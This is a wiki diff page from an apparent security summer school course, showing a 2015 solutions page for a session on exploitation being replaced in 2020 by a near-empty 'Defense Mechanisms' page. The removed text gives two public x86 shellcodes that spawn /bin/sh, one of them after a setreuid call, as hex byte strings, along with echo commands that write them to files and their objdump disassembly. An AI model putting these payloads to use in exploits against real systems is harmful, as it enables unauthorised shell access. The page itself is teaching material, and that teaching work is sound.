Differences

This shows you the differences between two versions of the page.

--- session:solution:09 [2015/07/09 00:59]
Razvan Deaconescu [Hello, World!]
+++ session:solution:09 [2020/07/19 12:49] (current)
@@ Line 1: / Line 1: @@
-====== Session 09 Solutions ======
+====== 0x09. Defense Mechanisms (Solutions) ======
-===== Create and disassemble binary shellcodes =====
-We extract the two shellcode byte strings from the given links ([[http://shell-storm.org/shellcode/files/shellcode-216.php|1]], [[http://shell-storm.org/shellcode/files/shellcode-827.php|2]]):<code>
-$ cat 216.print
-\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff
-$ cat 827.print
-\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
-</code>
-and then we use ''echo'' to generate two binary shellcode files:<code>
-$ echo -en '\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff' > 216.bin
-$ echo -en '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' > 827.bin
-</code>
-Afterwards, we disassemble the binary shellcode files:<code>
-$ objdump -D -b binary -m i386 -M intel 827.bin
-.bin:     file format binary
-Disassembly of section .data:
-00000000 <.data>:
-:	31 c0                	xor    eax,eax
-:	50                   	push   eax
-:	68 2f 2f 73 68       	push   0x68732f2f
-:	68 2f 62 69 6e       	push   0x6e69622f
-   d:	89 e3                	mov    ebx,esp
-   f:	50                   	push   eax
-:	53                   	push   ebx
-:	89 e1                	mov    ecx,esp
-:	b0 0b                	mov    al,0xb
-:	cd 80                	int    0x80
-$ objdump -D -b binary -m i386 -M intel 216.bin
-.bin:     file format binary
-Disassembly of section .data:
-00000000 <.data>:
-:	6a 46                	push   0x46
-:	58                   	pop    eax
-:	31 db                	xor    ebx,ebx
-:	31 c9                	xor    ecx,ecx
-:	cd 80                	int    0x80
-:	eb 21                	jmp    0x2c
-   b:	5f                   	pop    edi
-   c:	6a 0b                	push   0xb
-   e:	58                   	pop    eax
-   f:	99                   	cdq
-:	52                   	push   edx
-:	66 68 2d 63          	pushw  0x632d
-:	89 e6                	mov    esi,esp
-:	52                   	push   edx
-:	68 2f 2f 73 68       	push   0x68732f2f
-d:	68 2f 62 69 6e       	push   0x6e69622f
-:	89 e3                	mov    ebx,esp
-:	52                   	push   edx
-:	57                   	push   edi
-:	56                   	push   esi
-:	53                   	push   ebx
-:	89 e1                	mov    ecx,esp
-a:	cd 80                	int    0x80
-c:	e8 da ff ff ff       	call   0xb
-</code>
-and we compare the resulting assembly source code to the one in the initial links. We find they are identical conforming we did a proper generation and disassembling of the binary shellcode files.
-===== Call Trampoline =====
 TODO
-===== Exploit with Known Buffer Address =====
-TODO
-===== Brute-Forcing the Buffer Address =====
-TODO
-===== NOP Sled =====
-TODO
-===== Environment variables =====
-TODO

Security Summer School

User Tools

Site Tools

Differences

Page Tools